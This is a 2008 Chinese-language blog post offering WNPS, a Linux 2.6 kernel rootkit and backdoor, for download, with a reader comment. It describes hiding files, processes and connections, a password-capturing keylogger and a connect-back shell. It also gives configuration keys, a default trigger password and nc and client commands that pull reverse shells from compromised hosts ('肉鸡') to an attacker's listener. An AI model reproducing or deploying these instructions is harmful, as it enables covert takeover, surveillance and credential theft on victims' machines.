Linux 2.6.x平台下后门程序

    [阴 February 23, 2008 10:31 | by ]
wnps-0.26-beta2精简测试版
WNPS 简介:
WNPS是一只工作在Linux 2.6.x平台下的rootkit+backdoor程序。
它的意思是wnps is not poc shell,我的意图在于将它设计成一个可用于实战的linux rootkit。
它最初的想法来自enyelkm,我对作者的开源精神深表感激。

开发平台:

2.6.9-5.EL

WNPS 功能特点:

-=-=精简测试版只有文件隐藏,目录隐藏,网络连接隐藏,后门伪终端,传输加密这几个最基本的功能-=-=

1、隐藏

   隐藏指定文件
   隐藏文件中特定的内容
   隐藏进程
   动态隐藏网络连接、进程-->用过sk的都知道什么是动态隐藏
   隐藏自身模块
   保护相关模块、进程、文件不被跟踪

2、内核反弹后门

   即使肉鸡没有开放任何TCP UDP端口并过滤icmp包,只要肉鸡让回连,我们就可以获得shell
   跨内核平台简易安装,拿着一个wnps.ko就可以管理所有2.6内核的机器,所有要做的事情只是执行insmod wnps.ko
   完美的伪终端支持,让你用起来更顺心
   可以设置定时自动回连,即使你的肉鸡在内网的深处,也不用担心她跑路

3、键盘记录功能
   想看看有没其他人在你的肉鸡里跳舞?这个是最好的办法,还可以通过键盘记录把别人的肉鸡给抢了,怎么抢,自己发挥想像空间吧。键盘记录功能对渗透和保护肉鸡都有相当重要的意义。键盘有两种模式,一个是密码模式,就是专门记录密码相关的了,只要触发了相关特征字符串,我们就记录下相应的内容,还有一个就是完全记录模式了,顾名思义了。

4、模块注射
   比adore-ng更稳定的模块注射方式

5、通讯加密

+----------------------------------------------------------------------------------------+

WNPS 用法:

服务端使用说明:

在安装之前,请先修改wnps目录下的config.h!!!

TCP_SHELL_KEY 表示要发送的主机密码,默认为@wztshell
HIDE_FILE     表示我们将隐藏以HIDE_FILE字符为前缀的文件
HIDE_TASK     表示我们将隐藏以HIDE_TASK字符为前缀的进程
HIDE_STR      表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串

HIDE_OPEN     表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
HIDE_CLOSE

主机需要能够被安装模块以及提供内核源代码。

make;make install

+----------------------------------------------------------------------------------------+

客户端使用说明:

WNPS的客户端将被设计成可以工作在linux和win平台上使用。

1。即可以发送tcp数据报来激活shell,又能用nc来连接服务器的某一端口来发送密码,以及
反弹ip和port。

2。使用方法简单灵活

注意:如果要使用nc做客户端,请先修改服务端和客户端的config.h中的
      ENCRYPT 为0。也就是不支持传输加密的功能。
      
1).在windows平台下,可以用nc作为客户端,连接肉鸡任意开放的一个端口。

  比如:
  ./nc -vvlp 8899
  ./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。

  (1).在本机的8899端口获得一个远程shell。
  @wztshell:5566
  
  (2).在192.168.75.128的5566端口获得一个远程shell。
  @wztshell:192.168.75.128:5566
  
2).在linux平台下,即可用nc作为客户端,又可采用自带的client作为客户端,并且允许发送
  tcp数据报来激活远程shell。
  
  ./client
  optinons:
  -tcp|packet [victim port] [connect back ip] [connect back port]
  -listen [port]
  
  -listen 在本地监听某一端口
  
  -tcp 发送tcp数据报,激活远程shell
   为远程服务器地址,必须填写这个参数。
  [victim port] 为远程服务器开放的端口,默认将会自动扫描常用开放的端口,在send.h里定义。
  [connect back ip] 为你要反弹回的主机地址,默认是本机公网ip地址,必须是可以让肉鸡能够回连的地址。
  [connect back port] 为你要反弹回的主机端口,默认为8899,在config.h里定义。
  
  +----------------------------------------------------------------------------+
  你可以很灵活的来使用WNPS的client。client默认的监听端口为8899,在client/config.h中设置
  设肉鸡ip为:192.168.75.130
  注意:如果是要在client端所在的主机上获得远程shell,无须使用-listen选项!
  
  (1).在本机的8899端口上获得一个远程shell。
  ./client -tcp 192.168.75.130

  (2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。
  ./client -tcp 192.168.75.130 22
  
  (3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。
  ./client -tcp 192.168.75.130 22 5566
  
  (4).在192.168.75.128的8899端口上获得一个远程shell。
  先在192.168.75.128上使用:
  ./client -listen
  
  然后在client所在的主机上使用:
  ./client -tcp 192.168.75.130 192.168.75.128
  
  (5).在192.168.75.128的5566端口上获得一个远程shell。
  ./client -listen 5566
  ./client -tcp 192.168.75.130 192.168.75.128 5566
  
  (6).向肉鸡的22端口发送数据报,然后在192.168.75.128的5566端口上获得一个远程shell。
  ./client -listen 5566
  ./client -tcp 192.168.75.130 22 192.168.75.128 5566

Download ( 1071 downloads)
Tools | Comments(1) | Trackbacks(0) | Reads(13275)
rice
May 5, 2008 14:24
这个后门我测试过,可以获得shell,但没有实际的权限,因为是一个测试版本,不过大家有兴趣,可以测试并学习学习。

p.s. 麻烦的是 linux 的内核一定要是2.6.x的  redhat 9 之类的 linux 就不能编译了
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive